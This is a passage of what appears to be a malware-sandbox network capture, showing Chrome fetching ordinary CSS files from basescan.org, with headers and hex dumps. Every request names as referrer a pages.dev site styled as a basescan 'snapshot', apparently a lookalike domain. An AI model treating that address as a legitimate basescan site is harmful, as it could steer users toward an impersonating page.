                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC507INData Raw: 2e 68 73 2d 6d 65 6e 75 2d 69 6e 69 74 69 61 6c 69 7a 65 64 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7a 2d 69 6e 64 65 78 3a 31 30 7d 2e 68 73 2d 6d 65 6e 75 2d 69 6e 69 74 69 61 6c 69 7a 65 64 20 2e 61 6e 69 6d 61 74 65 64 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 33 30 30 6d 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 33 30 30 6d 73 7d 2e 68 73 2d 6f 76 65 72 66 6c 6f 77 2d 78 2d 6c 6f 63 6b 65 64 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 7d 2e 68 73 2d 73 75 62 2d 6d 65 6e 75 2c 2e 68 73 2d 6d 65 67 61 2d 6d 65 6e 75 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 30 3b 74 6f 70 3a 31 30 30 25 3b 7a 2d
                                                                                                                                                                                                                                              Data Ascii: .hs-menu-initialized{position:relative;z-index:10}.hs-menu-initialized .animated{-webkit-animation-duration:300ms;animation-duration:300ms}.hs-overflow-x-locked{overflow-x:hidden}.hs-sub-menu,.hs-mega-menu{display:none;position:absolute;left:0;top:100%;z-
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 68 73 2d 73 75 62 2d 6d 65 6e 75 2d 6f 70 65 6e 65 64 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 2e 68 73 2d 73 75 62 2d 6d 65 6e 75 20 2e 68 73 2d 73 75 62 2d 6d 65 6e 75 2c 2e 68 73 2d 6d 65 67 61 2d 6d 65 6e 75 20 2e 68 73 2d 73 75 62 2d 6d 65 6e 75 2c 2e 68 73 2d 73 75 62 2d 6d 65 6e 75 20 2e 68 73 2d 6d 65 67 61 2d 6d 65 6e 75 2c 2e 68 73 2d 6d 65 67 61 2d 6d 65 6e 75 20 2e 68 73 2d 6d 65 67 61 2d 6d 65 6e 75 7b 74 6f 70 3a 30 3b 6c 65 66 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 7d 2e 68 73 2d 6d 65 6e 75 2d 76 65 72 74 69 63 61 6c 20 2e 68 73 2d 73 75 62 2d 6d 65 6e 75 2c 2e 68 73 2d 6d 65 6e 75 2d 76 65 72 74 69 63 61 6c 20 2e 68 73 2d 6d 65 67 61 2d 6d 65 6e 75 7b 74 6f 70 3a 30
                                                                                                                                                                                                                                              Data Ascii: ion:relative}.hs-sub-menu-opened{overflow:visible}.hs-sub-menu .hs-sub-menu,.hs-mega-menu .hs-sub-menu,.hs-sub-menu .hs-mega-menu,.hs-mega-menu .hs-mega-menu{top:0;left:100%;margin-top:0}.hs-menu-vertical .hs-sub-menu,.hs-menu-vertical .hs-mega-menu{top:0
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1069INData Raw: 62 69 6c 65 2d 73 74 61 74 65 29 20 2e 68 73 2d 73 75 62 2d 6d 65 6e 75 20 2e 68 73 2d 6d 65 67 61 2d 6d 65 6e 75 2e 68 73 2d 72 65 76 65 72 73 65 64 2c 2e 68 73 2d 6d 65 6e 75 2d 69 6e 69 74 69 61 6c 69 7a 65 64 3a 6e 6f 74 28 2e 68 73 2d 6d 6f 62 69 6c 65 2d 73 74 61 74 65 29 20 2e 68 73 2d 6d 65 67 61 2d 6d 65 6e 75 20 2e 68 73 2d 6d 65 67 61 2d 6d 65 6e 75 2e 68 73 2d 72 65 76 65 72 73 65 64 7b 6c 65 66 74 3a 61 75 74 6f 3b 72 69 67 68 74 3a 31 30 30 25 7d 2e 68 73 2d 6d 65 6e 75 2d 69 6e 69 74 69 61 6c 69 7a 65 64 2e 68 73 2d 72 74 6c 3a 6e 6f 74 28 2e 68 73 2d 6d 6f 62 69 6c 65 2d 73 74 61 74 65 29 20 2e 68 73 2d 73 75 62 2d 6d 65 6e 75 2e 68 73 2d 72 65 76 65 72 73 65 64 2c 2e 68 73 2d 6d 65 6e 75 2d 69 6e 69 74 69 61 6c 69 7a 65 64 2e 68 73 2d 72
                                                                                                                                                                                                                                              Data Ascii: bile-state) .hs-sub-menu .hs-mega-menu.hs-reversed,.hs-menu-initialized:not(.hs-mobile-state) .hs-mega-menu .hs-mega-menu.hs-reversed{left:auto;right:100%}.hs-menu-initialized.hs-rtl:not(.hs-mobile-state) .hs-sub-menu.hs-reversed,.hs-menu-initialized.hs-r


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              25192.168.2.549749104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC660OUTGET /assets/vendor/malihu-custom-scrollbar-plugin/jquery.mCustomScrollbar.css?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC858INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:01 GMT
                                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                                              Content-Length: 43197
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: minify
                                                                                                                                                                                                                                              Cf-Polished: origSize=54850
                                                                                                                                                                                                                                              ETag: "0d2ce75dabd41:0"
                                                                                                                                                                                                                                              Last-Modified: Sun, 13 Jan 2019 06:59:00 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 87380
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a%2BXr9VHnjkNLM6veHLx64tcZMu8%2F8AaqX7gy4dJPBLqXxBZZCjrNxfJx047Fa5MC232mgHlRHS0gtVp2iGgd9LQbFaR3YWIByKAzIPgKEm7X6VXRPUblLRITJD7Gxg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2beaaf2177c-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC511INData Raw: 2e 6d 43 75 73 74 6f 6d 53 63 72 6f 6c 6c 62 61 72 7b 2d 6d 73 2d 74 6f 75 63 68 2d 61 63 74 69 6f 6e 3a 70 69 6e 63 68 2d 7a 6f 6f 6d 3b 74 6f 75 63 68 2d 61 63 74 69 6f 6e 3a 70 69 6e 63 68 2d 7a 6f 6f 6d 7d 2e 6d 43 75 73 74 6f 6d 53 63 72 6f 6c 6c 62 61 72 2e 6d 43 53 5f 6e 6f 5f 73 63 72 6f 6c 6c 62 61 72 2c 2e 6d 43 75 73 74 6f 6d 53 63 72 6f 6c 6c 62 61 72 2e 6d 43 53 5f 74 6f 75 63 68 5f 61 63 74 69 6f 6e 7b 2d 6d 73 2d 74 6f 75 63 68 2d 61 63 74 69 6f 6e 3a 61 75 74 6f 3b 74 6f 75 63 68 2d 61 63 74 69 6f 6e 3a 61 75 74 6f 7d 2e 6d 43 75 73 74 6f 6d 53 63 72 6f 6c 6c 42 6f 78 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31
                                                                                                                                                                                                                                              Data Ascii: .mCustomScrollbar{-ms-touch-action:pinch-zoom;touch-action:pinch-zoom}.mCustomScrollbar.mCS_no_scrollbar,.mCustomScrollbar.mCS_touch_action{-ms-touch-action:auto;touch-action:auto}.mCustomScrollBox{position:relative;overflow:hidden;height:100%;max-width:1
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 67 69 6e 2d 6c 65 66 74 3a 33 30 70 78 7d 2e 6d 43 53 2d 64 69 72 2d 72 74 6c 3e 2e 6d 43 53 42 5f 69 6e 73 69 64 65 3e 2e 6d 43 53 42 5f 63 6f 6e 74 61 69 6e 65 72 2e 6d 43 53 5f 6e 6f 5f 73 63 72 6f 6c 6c 62 61 72 5f 79 2e 6d 43 53 5f 79 5f 68 69 64 64 65 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 2e 6d 43 53 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c 73 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 36 70 78 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6c 65 66 74 3a 61 75 74 6f 3b 74 6f 70 3a 30 3b 72 69 67 68 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 7d 2e 6d 43 53 42 5f 6f 75 74 73 69 64 65 2b 2e 6d 43 53 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c 73 7b 72 69 67 68 74 3a 2d 32 36 70 78 7d 2e 6d 43 53 2d 64 69 72 2d 72 74 6c 3e 2e 6d 43 53
                                                                                                                                                                                                                                              Data Ascii: gin-left:30px}.mCS-dir-rtl>.mCSB_inside>.mCSB_container.mCS_no_scrollbar_y.mCS_y_hidden{margin-left:0}.mCSB_scrollTools{position:absolute;width:16px;height:auto;left:auto;top:0;right:0;bottom:0}.mCSB_outside+.mCSB_scrollTools{right:-26px}.mCS-dir-rtl>.mCS
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 43 53 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c 73 5f 6f 6e 44 72 61 67 5f 65 78 70 61 6e 64 20 2e 6d 43 53 42 5f 64 72 61 67 67 65 72 43 6f 6e 74 61 69 6e 65 72 3a 68 6f 76 65 72 20 2e 6d 43 53 42 5f 64 72 61 67 67 65 72 52 61 69 6c 7b 77 69 64 74 68 3a 38 70 78 7d 2e 6d 43 53 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c 73 20 2e 6d 43 53 42 5f 62 75 74 74 6f 6e 55 70 2c 2e 6d 43 53 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c 73 20 2e 6d 43 53 42 5f 62 75 74 74 6f 6e 44 6f 77 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 68 65 69 67 68 74 3a 32 30 70 78 3b 77 69 64 74 68 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d
                                                                                                                                                                                                                                              Data Ascii: CSB_scrollTools_onDrag_expand .mCSB_draggerContainer:hover .mCSB_draggerRail{width:8px}.mCSB_scrollTools .mCSB_buttonUp,.mCSB_scrollTools .mCSB_buttonDown{display:block;position:absolute;height:20px;width:100%;overflow:hidden;margin:0 auto;cursor:pointer}
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 74 61 69 6e 65 72 3a 68 6f 76 65 72 20 2e 6d 43 53 42 5f 64 72 61 67 67 65 72 20 2e 6d 43 53 42 5f 64 72 61 67 67 65 72 5f 62 61 72 7b 68 65 69 67 68 74 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 32 70 78 20 61 75 74 6f 7d 2e 6d 43 53 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c 73 5f 68 6f 72 69 7a 6f 6e 74 61 6c 2e 6d 43 53 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c 73 5f 6f 6e 44 72 61 67 5f 65 78 70 61 6e 64 20 2e 6d 43 53 42 5f 64 72 61 67 67 65 72 2e 6d 43 53 42 5f 64 72 61 67 67 65 72 5f 6f 6e 44 72 61 67 5f 65 78 70 61 6e 64 65 64 2b 2e 6d 43 53 42 5f 64 72 61 67 67 65 72 52 61 69 6c 2c 2e 6d 43 53 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c 73 5f 68 6f 72 69 7a 6f 6e 74 61 6c 2e 6d 43 53 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c 73 5f 6f 6e 44 72 61 67 5f 65 78 70 61 6e 64 20 2e
                                                                                                                                                                                                                                              Data Ascii: tainer:hover .mCSB_dragger .mCSB_dragger_bar{height:12px;margin:2px auto}.mCSB_scrollTools_horizontal.mCSB_scrollTools_onDrag_expand .mCSB_dragger.mCSB_dragger_onDrag_expanded+.mCSB_draggerRail,.mCSB_scrollTools_horizontal.mCSB_scrollTools_onDrag_expand .
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c 73 5f 68 6f 72 69 7a 6f 6e 74 61 6c 2c 2e 6d 43 53 2d 64 69 72 2d 72 74 6c 3e 2e 6d 43 75 73 74 6f 6d 53 63 72 6f 6c 6c 42 6f 78 2e 6d 43 53 42 5f 76 65 72 74 69 63 61 6c 5f 68 6f 72 69 7a 6f 6e 74 61 6c 2e 6d 43 53 42 5f 69 6e 73 69 64 65 3e 2e 6d 43 53 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c 73 2e 6d 43 53 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c 73 5f 68 6f 72 69 7a 6f 6e 74 61 6c 7b 72 69 67 68 74 3a 30 7d 2e 6d 43 53 2d 64 69 72 2d 72 74 6c 3e 2e 6d 43 75 73 74 6f 6d 53 63 72 6f 6c 6c 42 6f 78 2e 6d 43 53 42 5f 76 65 72 74 69 63 61 6c 5f 68 6f 72 69 7a 6f 6e 74 61 6c 2e 6d 43 53 42 5f 69 6e 73 69 64 65 3e 2e 6d 43 53 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c 73 2e 6d 43 53 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c 73 5f 68 6f 72 69 7a
                                                                                                                                                                                                                                              Data Ascii: B_scrollTools_horizontal,.mCS-dir-rtl>.mCustomScrollBox.mCSB_vertical_horizontal.mCSB_inside>.mCSB_scrollTools.mCSB_scrollTools_horizontal{right:0}.mCS-dir-rtl>.mCustomScrollBox.mCSB_vertical_horizontal.mCSB_inside>.mCSB_scrollTools.mCSB_scrollTools_horiz
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 20 2e 32 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 2c 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 2e 32 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 6f 70 61 63 69 74 79 20 2e 32 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 2c 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 2e 32 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 7d 2e 6d 43 53 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c 73 5f 76 65 72 74 69 63 61 6c 2e 6d 43 53 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c 73 5f 6f 6e 44 72 61 67 5f 65 78 70 61 6e 64 20 2e 6d 43 53 42 5f 64 72 61 67 67 65 72 5f 62 61 72 2c 2e 6d 43 53 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c 73 5f 76 65 72 74 69 63 61 6c 2e 6d 43 53 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c 73 5f 6f 6e 44 72 61 67 5f 65 78 70 61 6e 64 20 2e 6d 43
                                                                                                                                                                                                                                              Data Ascii: .2s ease-in-out,background-color .2s ease-in-out;transition:opacity .2s ease-in-out,background-color .2s ease-in-out}.mCSB_scrollTools_vertical.mCSB_scrollTools_onDrag_expand .mCSB_dragger_bar,.mCSB_scrollTools_vertical.mCSB_scrollTools_onDrag_expand .mC
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 2d 6f 75 74 7d 2e 6d 43 53 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c 73 7b 6f 70 61 63 69 74 79 3a 2e 37 35 3b 66 69 6c 74 65 72 3a 22 61 6c 70 68 61 28 6f 70 61 63 69 74 79 3d 37 35 29 22 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 61 6c 70 68 61 28 6f 70 61 63 69 74 79 3d 37 35 29 22 7d 2e 6d 43 53 2d 61 75 74 6f 48 69 64 65 3e 2e 6d 43 75 73 74 6f 6d 53 63 72 6f 6c 6c 42 6f 78 3e 2e 6d 43 53 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c 73 2c 2e 6d 43 53 2d 61 75 74 6f 48 69 64 65 3e 2e 6d 43 75 73 74 6f 6d 53 63 72 6f 6c 6c 42 6f 78 7e 2e 6d 43 53 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c 73 7b 6f 70 61 63 69 74 79 3a 30 3b 66 69 6c 74 65 72 3a 22 61 6c 70 68 61 28 6f 70 61 63 69 74 79 3d 30 29 22 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 61 6c 70 68 61 28 6f 70 61 63 69 74 79 3d
                                                                                                                                                                                                                                              Data Ascii: -out}.mCSB_scrollTools{opacity:.75;filter:"alpha(opacity=75)";-ms-filter:"alpha(opacity=75)"}.mCS-autoHide>.mCustomScrollBox>.mCSB_scrollTools,.mCS-autoHide>.mCustomScrollBox~.mCSB_scrollTools{opacity:0;filter:"alpha(opacity=0)";-ms-filter:"alpha(opacity=
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 6c 70 68 61 28 6f 70 61 63 69 74 79 3d 39 30 29 22 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 61 6c 70 68 61 28 6f 70 61 63 69 74 79 3d 39 30 29 22 7d 2e 6d 43 53 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c 73 20 2e 6d 43 53 42 5f 62 75 74 74 6f 6e 55 70 2c 2e 6d 43 53 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c 73 20 2e 6d 43 53 42 5f 62 75 74 74 6f 6e 44 6f 77 6e 2c 2e 6d 43 53 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c 73 20 2e 6d 43 53 42 5f 62 75 74 74 6f 6e 4c 65 66 74 2c 2e 6d 43 53 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c 73 20 2e 6d 43 53 42 5f 62 75 74 74 6f 6e 52 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 6d 43 53 42 5f 62 75 74 74 6f 6e 73 2e 70 6e 67 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b
                                                                                                                                                                                                                                              Data Ascii: lpha(opacity=90)";-ms-filter:"alpha(opacity=90)"}.mCSB_scrollTools .mCSB_buttonUp,.mCSB_scrollTools .mCSB_buttonDown,.mCSB_scrollTools .mCSB_buttonLeft,.mCSB_scrollTools .mCSB_buttonRight{background-image:url(mCSB_buttons.png);background-repeat:no-repeat;
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 72 6f 6c 6c 54 6f 6f 6c 73 20 2e 6d 43 53 42 5f 64 72 61 67 67 65 72 3a 61 63 74 69 76 65 20 2e 6d 43 53 42 5f 64 72 61 67 67 65 72 5f 62 61 72 2c 2e 6d 43 53 2d 64 61 72 6b 2e 6d 43 53 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c 73 20 2e 6d 43 53 42 5f 64 72 61 67 67 65 72 2e 6d 43 53 42 5f 64 72 61 67 67 65 72 5f 6f 6e 44 72 61 67 20 2e 6d 43 53 42 5f 64 72 61 67 67 65 72 5f 62 61 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 39 29 7d 2e 6d 43 53 2d 64 61 72 6b 2e 6d 43 53 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c 73 20 2e 6d 43 53 42 5f 62 75 74 74 6f 6e 55 70 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 38 30 70 78 20 30 7d 2e 6d 43 53 2d 64 61 72 6b 2e 6d 43 53 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c
                                                                                                                                                                                                                                              Data Ascii: rollTools .mCSB_dragger:active .mCSB_dragger_bar,.mCS-dark.mCSB_scrollTools .mCSB_dragger.mCSB_dragger_onDrag .mCSB_dragger_bar{background-color:rgba(0,0,0,.9)}.mCS-dark.mCSB_scrollTools .mCSB_buttonUp{background-position:-80px 0}.mCS-dark.mCSB_scrollTool
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 35 35 2c 32 35 35 2c 2e 38 35 29 7d 2e 6d 43 53 2d 6c 69 67 68 74 2d 32 2e 6d 43 53 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c 73 20 2e 6d 43 53 42 5f 64 72 61 67 67 65 72 3a 61 63 74 69 76 65 20 2e 6d 43 53 42 5f 64 72 61 67 67 65 72 5f 62 61 72 2c 2e 6d 43 53 2d 6c 69 67 68 74 2d 32 2e 6d 43 53 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c 73 20 2e 6d 43 53 42 5f 64 72 61 67 67 65 72 2e 6d 43 53 42 5f 64 72 61 67 67 65 72 5f 6f 6e 44 72 61 67 20 2e 6d 43 53 42 5f 64 72 61 67 67 65 72 5f 62 61 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 2e 39 29 7d 2e 6d 43 53 2d 6c 69 67 68 74 2d 32 2e 6d 43 53 42 5f 73 63 72 6f 6c 6c 54 6f 6f 6c 73 20 2e 6d
                                                                                                                                                                                                                                              Data Ascii: 55,255,.85)}.mCS-light-2.mCSB_scrollTools .mCSB_dragger:active .mCSB_dragger_bar,.mCS-light-2.mCSB_scrollTools .mCSB_dragger.mCSB_dragger_onDrag .mCSB_dragger_bar{background-color:#fff;background-color:rgba(255,255,255,.9)}.mCS-light-2.mCSB_scrollTools .m


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              26192.168.2.549754104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC634OUTGET /assets/vendor/select2/dist/css/select2.min.css?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC805INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:01 GMT
                                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Wed, 15 Jul 2020 08:45:00 GMT
                                                                                                                                                                                                                                              ETag: W/"08e7239845ad61:0"
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 87380
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PdMoimtTJOt9B4l8RQzUkUN6pqBXjuUcTX8TwFTw%2BGUDHnrABY6wHuh0i9LuVWLMxoxe4lSE%2B7v%2FxvG%2ByBAzivM6pQ0k3pnYowlQnDOTFrGOgbguplpQdumpZonG%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2bedeae4391-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC564INData Raw: 33 61 37 37 0d 0a 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 2d 2d 73 69 6e 67 6c 65 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 32 38 70 78 3b 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 75 73 65 72
                                                                                                                                                                                                                                              Data Ascii: 3a77.select2-container{box-sizing:border-box;display:inline-block;margin:0;position:relative;vertical-align:middle}.select2-container .select2-selection--single{box-sizing:border-box;cursor:pointer;display:block;height:28px;user-select:none;-webkit-user
